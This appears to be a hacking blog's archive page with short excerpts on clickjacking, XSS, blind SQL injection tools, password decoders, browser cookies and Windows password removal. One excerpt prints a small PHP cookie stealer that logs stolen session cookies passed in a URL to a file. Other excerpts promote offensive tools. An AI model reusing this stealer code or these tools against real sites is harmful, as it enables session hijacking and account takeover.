What is Clickjacking Attack? How to Prevent? | UI Redressing

Will answering simple maths quiz delete your Social Network account?  If your answer is “No”, then check this news Linkedin Clickjacking Vulnerability and come back.  Will visiting a website turn on your webcam? The answer is “Yes”.  Check this Flash player clickjacking vulnerability. If you read above news completely, It will be easy for you […]

Cross Site Scripting(XSS) Complete Tutorial for Beginners~ Web Application Vulnerability

What is XSS?Cross Site Scripting also known as XSS , is one of the most common web appliction vulnerability that allows an attacker to run his own client side scripts(especially Javascript) into web pages viewed by other users. In a typical XSS attack, a hacker inject his malicious javascript code in the legitimate website . […]

Automated Blind SQL Injection Attacking Tools~bsqlbf Brute forcer

What is Blind SQL Injection: Some Websites are vulnerable to SQL Injection but the results of injection are not visible to the attacker.  In this situation, Blind SQL Injection is used. The page with the vulnerability may not be one that displays data but will display differently depending on the results of a logical statement […]

Learn Web Application Exploits and Defenses for free~Penetration Testing

Are you willing to Learn Web Application Exploitation and Defense against that? Here is the chance for you.   Google Labs provides a Lab to learn Web Application for free of cost.Penetration Testing : Learn how hackers find security vulnerabilities! Learn how hackers exploit web applications! Learn how to stop them!  This code lab shows how […]

Online IMVU & DynDNS Password Decoders from Security Xploded

SecurityXploded provides online decoders for IMVU and DynDNS. IMVU: is a popular 3D based social game and entertainment site where millions of people meet, chat, play games and have fun.DynDNS: popuar Dynamic DNS management solution offering enterprise-level DNS performance and reliability. New Online IMVU password decoder to instantly recover the password stored by IMVU messenger. […]

How to create cookie stealer Coding in PHP?~ get via email

Here is the simple Cookie Stealer code:Cookie stored in File: <?php$cookie = $HTTP_GET_VARS[“cookie”];$steal = fopen(“cookiefile.txt”, “a”);fwrite($steal, $cookie .”\n”);fclose($steal);?> $cookie = $HTTP_GET_VARS[“cookie”]; steal the cookie from the current url(stealer.php?cookie=x)and store the cookies in $cookie variable. $steal = fopen(“cookiefile.txt”, “a”); This open the cookiefile in append mode so that we can append the stolen cookie. fwrite($steal, $cookie […]

What is Computer/Browser Cookies? ~Use of Cookies

 What is Cookies? HTTP cookie or Browser Cookie are used to store the information about the visitors. Also cookies used to store the Login informations(username ,passwords). It will be useful to track visitors wish so that display the related info or ads. Different Types of Cookies: Session cookieA session cookie upto certain hours,depending on website.  […]

How to Recover Windows 7 Password~Windows Password Killer Tool

I have explained how to recover the lost password using Backtrack Password Cracking. Here i am going to introduce a new tool named as Windows Password Killer. It enables you remove windows 7 password to reset the administrator, standard user and guest passwords easily without any data losing or file damage. There is 3 different […]